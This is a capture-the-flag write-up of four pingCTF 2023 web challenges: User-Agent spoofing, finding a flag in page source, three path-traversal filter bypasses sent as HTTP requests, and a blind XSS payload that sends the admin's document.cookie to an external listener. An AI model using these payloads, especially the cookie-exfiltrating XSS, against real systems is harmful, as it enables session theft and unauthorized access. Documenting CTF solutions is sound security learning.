Posts Tags Categories web-writeups whoami

pingCTF 2023 - web(4x) writeups

xeunwa  included in  categories CTF Web
     586 words  3 minutes 

Raw solutions for solved pingCTF 2023 Web challenges

web/internet-explorer

Challenge: Manipulate the User agent so that the looks like a linux running internet explorer.

1
2
3

GET / HTTP/2
Host: internet-explorer.knping.pl
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Linux x86_64)

Useful site: https://www.useragentstring.com/pages/Internet%20Explorer/

web/youtube-trailer

Challenge: The only provided information was the youtube link.

solution: Simply find the flag in the source

1
2

firefox "view-source:https://www.youtube.com/watch?v=siZPvEGrtNY"
# Search for "ping{" using ctrl+F

web/path-traversal-101

Challenge: Bypass the input validation to perform Path Traversal

tasks.js:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

import path from "path";

const preTask = (solution) => {
    if (typeof solution !== "string") {
        throw new Error("Solution must be a string");
    }
    if (solution.length > 512) {
        throw new Error("Solution must be less than 512 characters");
    }
    if (solution === "flag") {
        throw new Error("Your solution can't be 'flag'");
    }
    if (solution === "./flag") {
        throw new Error("Your solution can't be './flag'");
    }
};

export const task1 = (solution) => {
    preTask(solution);
    if (!solution.startsWith("/robot") || solution.endsWith("/flag")) {
        throw new Error(
            `You cannot access the flag (task1)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const task2 = (solution) => {
    preTask(solution);
    solution = solution.replaceAll("../", "");
    if (solution === "/flag") {
        throw new Error(
            `You cannot ACCESS the flag (task2)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const task3 = (solution) => {
    preTask(solution);
    if (solution.includes("../") || solution === "/flag") {
        throw new Error(
            `You CANNOT ACCESS the flag (task3)!!! You are UNAUTHORIZED!!! Solution:\n ${solution}, \n ${path.join("/", solution)}`
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";
};

export const tasks = [
    `if (!solution.startsWith("/robot") || solution.endsWith("/flag")) {
    throw new Error(
        "You cannot access the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
    );
}

const solutionPath = path.join("/", solution);
return solutionPath === "/flag";`,
    `solution = solution.replaceAll("../", "");
    if (solution === "/flag") {
        throw new Error(
            "You cannot ACCESS the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
        );
    }

    const solutionPath = path.join("/", solution);
    return solutionPath === "/flag";`,
    `if (solution.includes("../") || solution === "/flag") {
    throw new Error(
        "You CANNOT ACCESS the flag!!! You are UNAUTHORIZED!!! 🤖🤖🤖🤖🤖"
    );
}

const solutionPath = path.join("/", solution);
return solutionPath === "/flag";`,
];

Challenge 1

1
2
3
4
5
6
7

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=/robot/../flag/.

Challenge 2

1
2
3
4
5
6
7

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=../flag/.

Challenge 3

1
2
3
4
5
6
7

POST /%F0%9F%A4%96 HTTP/2
Host: path-traversal-101.knping.pl
Cookie: token=<token>; Path=/
User-Agent: robot
Content-Type: application/x-www-form-urlencoded

solution=././flag/.

web/i-see-no-vulnerability

Challenge: Perform Blind XSS and retrieve admin cookie

I found out that I can inject JavaScript in the script tag because it is not sanitized by the DOMPurify.

Vulnerable Code

vulnerability

Blind-XSS payload

1
2
3
4

 " + function(){
  flag = document.cookie;
new Image().src="http://<redacted>?flag="+ flag;
  return 1}(); document.getElementById("vision").textContent = text; //

Generate PNG with payload

payload

Setup listener server then report the image to get the flag =)

Updated on 2023-12-11
 Header InjectionPath TraversalXSSOCRCode ReviewJavaScriptExpress
Back | Home